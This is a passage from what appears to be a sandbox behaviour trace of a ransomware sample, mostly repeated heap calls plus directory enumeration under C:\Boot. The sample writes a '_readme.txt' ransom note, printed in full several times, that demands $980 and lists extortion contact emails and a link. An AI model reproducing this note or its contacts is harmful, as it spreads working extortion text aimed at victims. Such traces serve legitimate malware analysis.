| out: hHeap=0x4970000) returned 1 [0127.919] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.919] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.919] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.919] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.919] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.919] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.919] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.919] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.919] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.919] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.919] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.919] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.919] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.919] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.919] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.919] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.919] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.919] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.919] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.919] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0127.919] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.920] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.920] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.920] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.920] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.920] PathFindFileNameW (pszPath="C:\\Boot\\en-US\\") returned="en-US\\" [0127.920] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0127.920] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0127.920] PathFindFileNameW (pszPath="") returned="" [0127.920] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0127.920] PathAppendW (in: pszPath="C:\\Boot\\en-US\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\en-US\\_readme.txt") returned 1 [0127.920] PathFileExistsW (pszPath="C:\\Boot\\en-US\\_readme.txt") returned 0 [0127.922] lstrcpyW (in: lpString1=0xdd2c688, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki" [0127.922] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki", lpString2="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH" [0127.924] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.924] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe3787dc0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3787dc0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0127.924] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0127.924] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0127.924] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3787dc0, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe3787dc0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3787dc0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0127.924] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3787dc0, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe3787dc0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3787dc0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0127.924] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0127.924] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.924] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce92c8 | out: hHeap=0x4970000) returned 1 [0127.924] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce92c8 [0127.924] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0127.924] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.924] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.924] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.924] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.925] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.925] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.925] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.925] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.925] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.925] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.925] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.925] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.925] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.925] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.925] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.925] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.925] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.925] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.925] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.925] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.925] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.925] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0127.925] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.926] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.926] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.926] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.926] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0127.926] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.926] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.926] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.926] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.926] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.926] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.926] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.926] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.926] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0127.926] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.926] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.926] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.926] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.926] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.926] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.926] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.926] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.926] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.926] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.926] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.926] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.926] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.926] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.926] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.927] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.927] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.927] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.927] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.927] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0127.927] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.927] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.927] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.927] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0127.927] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.927] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.927] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.927] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.927] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.927] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.927] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.927] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.927] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.927] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.927] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.927] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.927] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.927] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.927] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.927] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.927] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.927] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.928] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.928] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.928] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.928] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.928] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.928] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.928] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.928] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.928] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.928] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.928] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.928] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.928] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.928] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.928] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0127.928] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.928] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.928] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.928] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.928] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.928] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.928] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.928] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.928] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.928] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0127.928] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.928] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.928] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.928] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.928] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.929] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.929] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.929] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.929] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.929] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.929] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.929] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.929] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.929] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.929] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.929] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.929] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.929] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.929] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.929] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.929] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.929] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0127.929] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.929] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.929] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.929] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.929] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0127.929] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.929] 